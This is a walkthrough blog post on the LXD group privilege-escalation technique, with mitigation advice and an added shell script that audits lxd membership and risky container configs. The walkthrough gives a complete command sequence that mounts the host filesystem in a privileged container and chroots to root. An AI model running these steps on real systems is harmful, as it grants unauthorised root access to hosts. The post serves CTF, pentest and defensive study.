LXD or PWNBOX

Intro

LXD PwnBox is a privilege escalation technique that exploits the LXD container management system on Linux. If a user has been added to the lxd group, they can create and run privileged containers, effectively gaining root access on the host. By mounting the host filesystem inside a container, an attacker can read or modify critical system files. This method is commonly used in CTFs and penetration tests when LXD is misconfigured. 🚀

Enumeration

Here we cover the situation where you are already inside the machine.

  • Let's check id in the terminal:

    id

    # result (note that you are in the lxd group!):
    uid=1000(kingkong) gid=1000(kingkong) groups=1000(kingkong),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)

  • If you see your user in lxd

Weaponization/Privilege Escalation

  • Prepare a home for the future container:

    mkdir /tmp/lxd && cd /tmp/lxd

  • Download the Alpine LXD tar file to its new home from GitHub, or use the CLI:

    wget https://github.com/saghul/lxd-alpine-builder/raw/refs/heads/master/alpine-v3.13-x86_64-20210218_0139.tar.gz -O alpine-v3.18-x86_64.tar.gz

  • Once the tar file is ready, import it into LXD:

    lxc image import alpine-v3.18-x86_64.tar.gz --alias myimage

  • Verify the image has been added:

    lxc image list

  • Create a new privileged LXD container with the imported Alpine image:

    lxc init myimage pwnbox -c security.privileged=true

  • NB: If you get "Error: No storage pool found. Please create a new storage pool", just create a storage pool like this (if you did not get the error, skip this step):

    lxc init myimage pwnbox -s mypool -c security.privileged=true

  • Give the container full access to the host’s file system:

    lxc config device add pwnbox mydevice disk source=/ path=/mnt/root recursive=true

  • Start the container:

    lxc start pwnbox

  • Confirm it’s running:

    lxc list

  • Now, enter the container:

    lxc exec pwnbox /bin/sh

  • Since the container is privileged and has access to the host’s filesystem, navigate to /mnt/root to access the main system:

    cd /mnt/root
    ls -la

  • Now become root:

    chroot /mnt/root /bin/bash

You’re root! 🎉

Cleanup (If Needed)

  • To remove the container after exploitation:

    lxc delete pwnbox --force
    lxc image delete myimage

Mitigation

  • Remove users from the lxd group:

    sudo gpasswd -d kingkong lxd

  • Restrict LXD container permissions:

    lxc config set core.https_address ""

  • Use AppArmor or SELinux to sandbox LXD properly.
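
The enumeration and mitigation steps above can be checked across a host with a short audit. The script below is an added example, not part of the original post: it lists every account in the lxd group (supplementary or primary membership) and flags an instance config that sets security.privileged or mounts the host root. The function names, the accounts deploy and svc-lxd, and the sample YAML are constructed for illustration; the YAML is assumed to match the output of lxc config show --expanded.

```shell
#!/bin/sh
# Added example, not from the original post: defensive audit for the LXD
# misconfiguration described above. Function names are hypothetical.

# lxd_group_members GROUP_FILE PASSWD_FILE [GROUP]
# Prints, sorted and de-duplicated, every account in GROUP: supplementary
# members (group file field 4) plus accounts whose primary GID is the group's.
lxd_group_members() {
    group_file=$1 passwd_file=$2 group=${3:-lxd}
    gid=$(awk -F: -v g="$group" '$1 == g { print $3; exit }' "$group_file")
    [ -n "$gid" ] || return 0    # group absent: nothing to report
    {
        awk -F: -v g="$group" '$1 == g { n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i] }' "$group_file"
        awk -F: -v gid="$gid" '$4 == gid { print $1 }' "$passwd_file"
    } | sort -u
}

# flag_instance_config reads instance YAML on stdin (assumed to be the output
# of `lxc config show --expanded NAME`) and prints one finding per risky setting.
flag_instance_config() {
    cfg=$(cat)
    printf '%s\n' "$cfg" |
        grep -Eq '^[[:space:]]*security\.privileged:[[:space:]]*"?true"?[[:space:]]*$' &&
        echo "privileged"
    printf '%s\n' "$cfg" | grep -Eq '^[[:space:]]*source:[[:space:]]*/[[:space:]]*$' &&
        echo "host-root-disk"
    return 0
}

# Constructed sample data, modelled on the id output in the post.
SAMPLE_GROUP='sudo:x:27:kingkong
lxd:x:108:kingkong,deploy'
SAMPLE_PASSWD='kingkong:x:1000:1000::/home/kingkong:/bin/bash
svc-lxd:x:998:108::/var/lib/svc:/usr/sbin/nologin'
SAMPLE_CONFIG='config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    source: /
    type: disk'

demo_dir=$(mktemp -d)
printf '%s\n' "$SAMPLE_GROUP"  > "$demo_dir/group"
printf '%s\n' "$SAMPLE_PASSWD" > "$demo_dir/passwd"
lxd_group_members "$demo_dir/group" "$demo_dir/passwd"
printf '%s\n' "$SAMPLE_CONFIG" | flag_instance_config
rm -rf "$demo_dir"
```

On a live host, pass /etc/group and /etc/passwd as the two file arguments; accounts that come from a directory service do not appear in those files and need a separate check.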
This post is licensed under CC BY 4.0 by the author.